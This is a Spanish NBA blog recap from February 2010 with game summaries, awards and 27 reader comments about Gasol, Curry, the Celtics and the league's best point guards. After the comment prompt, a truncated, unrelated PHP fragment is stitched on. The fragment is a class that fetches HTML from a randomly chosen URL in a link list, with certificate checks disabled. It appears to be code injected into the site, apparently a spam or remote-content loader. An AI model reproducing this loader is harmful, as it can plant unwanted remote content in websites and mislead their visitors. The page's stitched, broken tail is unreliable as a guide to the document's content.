La Crónica (10/02/10)

11 de February de 2010 por telekoman

Penúltima jornada antes del parón del All Star con los equipos intentando dejar preparadas sus mejores armas para estar lo más arriba posible (o lo más abajo, que nunca se sabe que es mejor).

10 partidos con pocas sorpresas. La más reseñable, la victoria de Miami sobre los Hawks de Atlanta que les permite alcanzar la septima plaza del Este. Sorpresa también por el hecho de que no sólo fuera Wade el que tirara del carro si no que O’Neal le acompañara estupendamente con 19 puntos y 10 rebotes, como en sus mejores tiempos. Por los Hawks bien los titulares con mención especial para Josh Smith y Joe Johnson, pero poco, muy poco acompañamiento del banquillo, tan sólo 8 puntos.

En el otro duelo importante en el Este Orlando obtuvo una renta de 20 puntos de ventaja sobre Chicago gracias principalmente al batacazo que se dio Rose en el minuto 3 del partido. Este hecho, junto con la baja de Noah, marcó profundamente el encuentro y facilitó en exceso la victoria de unos Magic liderados por un Dwight Howard que sin hacer un partido excelso se fue a 18 puntos y 14 rebotes. Por los Bulls el único que plantó cara fue Luol Deng que por momentos nos recuerda a aquel jugador que entraba en todas las quinielas para ser uno de los grandes.

El Oeste el partido más importante lo disputaron los Lakers y los Jazz en Salt Lake City. 22 puntos de Pau Gasol, muy bien acompañados de 19 rebotes, 4 asistencias y 5 tapones, junto a los 25 puntos y 11 rebotes de Lamar Odom bastaron para doblegar a unos Jazz donde sólo Kirilenko y Deron Williams (a un rebote del triple doble) aparecieron. Importante victoria de nuevo sin Kobe ni Bynum y con buenas apariciones de la segunda línea como la de Farmar. También es interesante ver que Pau ha sido el mejor asistente de los Lakers en los dos últimos partidos.

Otro de los favoritos del Este, Boston, se vuelve a estrellar, y van 3 consecutivas, esta vez frente a New Orleans. Los de Doc Rivers jugaron un partido infame, con un Garnett totalmente cojo, un Pierce al que el balón no le hacía el más minimo caso y un Rondo totalmente fuera de sitio. Es difícil ganar un partido cuando el número de pérdidas supera al de asistencias. Esta frase tan bonita (aunque un poco ñoña, que diría Rudy) no es del todo cierta, ya que los Hornets se llevaron el partido con 23 pérdidas frente a 22 asistencias. Mención especial merece Darren Collison. El sustituto de Chris Paul durante su lesión se quedó a sólo una asistencia de su primer “triple doble”. 25 puntos, 9 asistencias y 10 pérdidas de balon, junto a una dirección lamentable hace que entendamos como los Celtics tuvieron opciones casi hasta el final de llevarse el partido.

El resto de los partidos tuvieron poca histora. Toronto ganó a Philadelphia con facilidad con los rumores sobre Bosh en el aire, Charlotte venció a los Wolves con Mohameed como héroe del partido, Sacramento se llevó el duelo de equipos sin aspiraciones a nada frente a Detroit, Milwaukee le sacó otros 20 puntos a los Nets y Portland recuperó algo de crédito gracias a su victoria frente a Phoenix con 62 puntos repartidísimos entre Aldridge, Blake y Miller. Por último Golden State no tuvo ninguna piedad de los Clippers con un Stephen Curry estelar.

PREMIOS

MVP: Gran partido de Pau Gasol con 22 puntos y 19 rebotes, pero no se lleva el premio. Stephen Jackson llegó hasta los 33 puntos… pero el premio tampoco es para él. Nazr Mohammed se acercó mucho mucho con 21 puntos y 20 rebotes más la canasta ganadora del partido… pero no. El premio se lo tenemos que dar al rookie Stephen Curry que hizo el primer triple doble de su corta carrera con 36 puntos, 13 asistencias y 10 rebotes. En 2 palabras: Im-presionante, que diría Jesulín de Ubrique.

Rookie: Creo que está todo dicho…

La sorpresa: Que Nazr Mohammed consiga 20 rebotes es una sorpresa en los tiempos que corren, que además consiga 21 puntos es un sorpresón, y si encima mete la canasta que decide el partido es para que él no olvide nunca este día.

La decepción: Y seguimos con los tiradores. No nos gusta nada, pero de nuevo tenemos que poner a Rudy Fernández en esta sección. Segundo partido consecutivo que se va sin anotar un solo punto . También Ben Gordon está para hacerselo mirar, 0 de 8 en tiros de campo hoy.

Mayor esfuerzo en vano: Los 26 puntos de Louis Williams en la derrota de Philadelphia frente a Toronto, junto a los 24 puntos y 9 rebotes de Amare Stoudemire son los más destacados.

Comenta

27 comentarios a esta entrada

  1. aro_pasado_no_newtoniano dice:
    #1

    Impresionantes los lakers,,con las bajas que tienen.

      Citar

  2. DUNC dice:
    #2

    2 cosas curiosas:

    Ya se que es algo normal, pero no puedo dejar de cabrearme cuando veo unos pasos clarísimos no no pitados, me parece que se pierde una de las esencias del basket. Asi que os recomiendo ver los pasos que hace Marvin Williams en la jugada 4 de la jornada. Parece Juanín García en un contraataque, solo que en vez de saltar y lanzar a portería, salta y hace un mate… (encima, para mas inri, lo meten en el top 10…)

    Muy gracioso ver como le dejan coger a Curry su último rebote que le faltaba para el triple doble en el ultimo segundo de partido. Entrañable.

    Y aparte de esto, gran victoria de Lakers, un golpecillo de autoridad que le hacía buena falta después del batacazo contra Denver en el Staples la semana pasada.

    Un saludo y gran blog, os sigo siempre!

      Citar

  3. Noname dice:
    #3

    No creo que Gasol aguantase el ritmo de jugar como primera espada todos los partidos con estos numeros, pero la verdad que me parece que esta a otro nivel. Ya no solo por sus numeros sino porque se ha echado el equipo a la espalda.

    Para mi el MVP de la jornada seguro, ya no solo por lo que suma, sino por lo que hace sumar a los demas

      Citar

  4. sayim dice:
    #4

    Que creeis que va a pasar con los Celtics antes del cierre del mercado? Algo necesitan, porque sea por lesiones o por mal juego están en una espiral de resultados muy muy negativa. Yo visto que Rasheed aun está para 25-30 minutejos decentes, y que tienen cierta profundidad de banquillo, paraba del todo a KG hasta que se recupere, si es que eso es posible…. Solo se que ahora mismo no es ni la sombra del jugador que fue, hasta parece que tira peor de 5 metros….

    Un saludo

      Citar

  5. TheDeerHunter dice:
    #5

    El problema es que lo que realmente acojona en Boston es que la única razón de que KG esté jugando es porque no hay esperanza de que mejore.

    No tengo ni idea del tema… pero, por favor, que esto no sea verdad.

      Citar

  6. Jona dice:
    #6

    7-11 en triples curry Jojo

      Citar

  7. Love Denise dice:
    #7

    Extraordinario Pau, confirmandose como el mejor 4 del mundo actualmente, mucho merito de los Lakers el ganar en la dificil pista de utah sin Bryant y Bynum.
    Gran temporada de Stephen Jackson, junto con Zach Randolph y Gerald Wallace, para mí son las mayores sorpresas positivas de la temporada.
    Creo que la progresión de Rudy se ha frenado ostensiblemente en Portland, sobre todo esta temporada, y eso que en teoría debe jugar más por las lesiones del equipo. No sé si es culpa suya o del sistema de Mcmillan, la realidad es que sólo hace partidos buenos cuando le entran los triples, el día que no le entran no hace nada más. Y precisamente Rudy tiene muchos recursos aparte de tirar de 3, pero no los está utilizando o no le dejan hacerlo.

      Citar

  8. pcerezo dice:
    #8

    Deer,

    Ya lo dije el otro día, es una lástima como se arrastra por la cancha. Jode ver a un tío que hace dos años se partía el pecho con una intensidad tremenda y que una maldita lexión nos hace no disfrutar de él. Los Celtics sin Garnett no pueden pelear con Lebron en el Este y contra lo que viene del Oeste (Laker, Denver, Utah, San Antonio).
    Yo creo que Ainge va a empezar a reconstruir ya. Este equipo se tiene que renovar porque Laker, Denver, Orlando, Cleveland (si Lebron no se va) son equipos con una estructura de plantilla fija y mucho más fuerte que la de ellos…Veremos.

    Pablo

      Citar

  9. Vader dice:
    #9

    Si lo de KG es definitivo y no se espera una mejora de su rodilla lo más razonable seria empezar a reconstruir. Pero será muy duro. De entrada Pierce seria el único jugador veterano por el que podrian sacar algo bueno. Rondo seria el jugador a mantener si o si. Pero se me hace muy difícil de ver el traspaso de Pierce en estos momentos…

    Allen es expiring y se podria sacar algo, pero de Garnett…

    En fin a ver que pasa.

    Saludos

      Citar

  10. TheDeerHunter dice:
    #10

    Por mi parte, ya sabéis que soy Laker hasta la médula y… anti-céltico (sin sentimientos fundamentalistas) desde que nací en el baloncesto. Así que mi comentario podría interpretarse como interesado. Espero que no lo veáis así, porque para mí lo más grande del mundo sería otra final Lakers-Celtics y ganarla de una puñetera vez.
    Viendo el bajón no dudo que quizás la opción más sensata podría ser el buscar la reconstrucción (opción para la que siempre se está a tiempo) pero precipitarse tampoco te asegura el que la travesía por el desierto vaya a ser más corta.
    Yo sigo creyendo en ese equipo… con Garnett cojo pienso que es mejor equipo que el que dió tantísima guerra en los playoffs del año pasado y me apostaría algo gordo a que la volverán a dar este año. No hay razones para pensar en Pierce retirado… y si yo tuviera que darle la bola a alguien para que la metiera para ganar no me lo pensaría demasiado para dársela a Allen.

    Yo hasta que este equipo no esté enterrado de verdad no iniciaría ninguna reconstrucción. La franquicia se lo debe.

      Citar

  11. Viva_Dirk dice:
    #11

    El tema de Kevin Martin les vendria genial, un jugador joven y perfecto para tirar del equipo durante la regular season acompañado de Rondo.

      Citar

  12. sergio dice:
    #12

    Quizás les vendría mejor a los Celtics un jugador interior antes que Kevin Martin. Wallace también se está arrastrando…. No están para competir con la nueva hornada de jugadores jóvenes que se dejan la piel en cada partido. Aunque esta claro que es un grandísimo traspaso para los intereses verdes.

    Si no me equivoco los Kings deberían añadir otro jugador al traspaso para que cuadrasen los sueldos no?

      Citar

  13. TheDeerHunter dice:
    #13

    Se que es una flipada total pero…
    ¿os imagináis que entra Sergio en la movida y termina jugando en los Celtics esta temporada??

    igual a más de uno le sorprendía Sergio

      Citar

  14. Love Denise dice:
    #14

    Pues sinceramente creo que jugaría menos que en los Kings. Con Rondo, actualmente el mejor base del este y uno de los 3 mejores de la liga y House que de vez en cuando hace un partido bueno, no creo que jugara mucho más que en estos 4 últimos años.

      Citar

  15. Rompe dice:
    #15

    Alguien me puede explicar en qué se basa exactamente el cálculo de la eficiencia en las estadísticas de la nba? Gracias!

      Citar

  16. Viva_Dirk dice:
    #16

    La eficiencia sale de sumar puntos, rebotes, asistencias, tapones y robos, a lo que se le restan las pérdidas, los tiros de campo fallados y los tiros libres fallados.

    @Denise: Por no discutir si Rondo es mejor actualmente que Rose, dirias que es mejor que Paul, Deron, Billups y Nash??

      Citar

  17. sergio dice:
    #17

    Rondo es el mejor defensor en el puesto de base de la liga a mi parecer… ni de lejos el mejor base. Quizas en un futuro lo sea con Paul y Deron (a ver Curry como evoluciona…)

      Citar

  18. HeiNeKeN dice:
    #18

    Yo sigo pensando que hasta que se retire, Nash es el mejor base de la NBA y desgraciadamente pasara a la lista de jugones sin anillo a no ser que los Suns le traspasen.

      Citar

  19. Viva_Dirk dice:
    #19

    En un futuro yo confio ciegamente en que Rose estará en la élite de los bases, con esos 2 que nombra Sergio y no se si Rondo es el tipo de jugador que llega a ese nivel. Hablar del resto(Curry, Jennings o cualquier otro es especular).

      Citar

  20. Love Denise dice:
    #20

    Sobre los bases, para mí Nash es el mejor, por detrás están Paul, Rondo, y Deron, en este orden.
    Sobre Rose, yo creo que juega mejor de 2 que de 1, como Jennings, Tyreke, o Iverson.

      Citar

  21. Viva_Dirk dice:
    #21

    Rose jamás ha jugado de 2 y tampoco Jennings.

      Citar

  22. Love Denise dice:
    #22

    Quiero decir que Rose, Jennings o Tyreke no son bases puros, al menos para mí, que pueden ejercer esa función, pues sí, pero no es el play maker de toda la vida. Sus estilos de juego van más acorde al escolta jugón tirador, que al de base organizativo cerebro del equipo.

      Citar

  23. Viva_Dirk dice:
    #23

    Tyreke Evans es un escolta, es donde mejor juega de calle. Pero siendo Rose un jugador que tira poco de larga distancia y que no se caracteriza por un juego individualista no comparto esa opinión.

    Deron tampoco es el playmaker de toda la vida, es un base anotador y ahí estan sus números.

      Citar

  24. Love Denise dice:
    #24

    Pues para mí Deron si es un base más organizativo, de ahcer jugar al equipo que Rose, y ahí están los números que algo tendrá que ver el hecho de que deron promedie 4 asistencias más que Rose. Yo al menos lo veo así.

      Citar

  25. sergio dice:
    #25

    Pues yo al que no metia de escolta es a Jennings. Y al que si metia seria a Rose… no seria el primer escolta que no sabe tirar de lejos… mira Jordan por decir uno de nivel medio… ¬¬. Y Deron es un base puro, otra cosa es que tenga esa valentia para encarar el aro. Y lo Evans creo que no admite mucha duda.. quizas sea el jugador mas parecido a Wade que ha salido ultimamente (salvando las distancias que ahora vendreis a poner el grito en el cielo…)

    Muy buena la vuelta de West. Su defensa exterior es impagable, aunque no se porque traspasaron a Shannon Brown con lo que esta aportando en Los Angeles. Bueno, a decir verdad, no recuerdo su nivel de juego durante su paso en Ohio

      Citar

  26. enzo dice:
    #26

    Los numeros pueden decir lo que quieran, pero para el mejor base de la liga yo solo veo dos nombres, Nash o Billups y me quedo con el segundo.

      Citar

  27. Viva_Dirk dice:
    #27

    Yo no niego que Rose sea un base anotador, no hay duda de que lo es pero aunque no de muchas asistencias es un base, no tiene juego al poste como requeriria un escolta sin tiro exterior, y aunque tiene un gran físico para un base, para un escolta estaría bien sin mas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>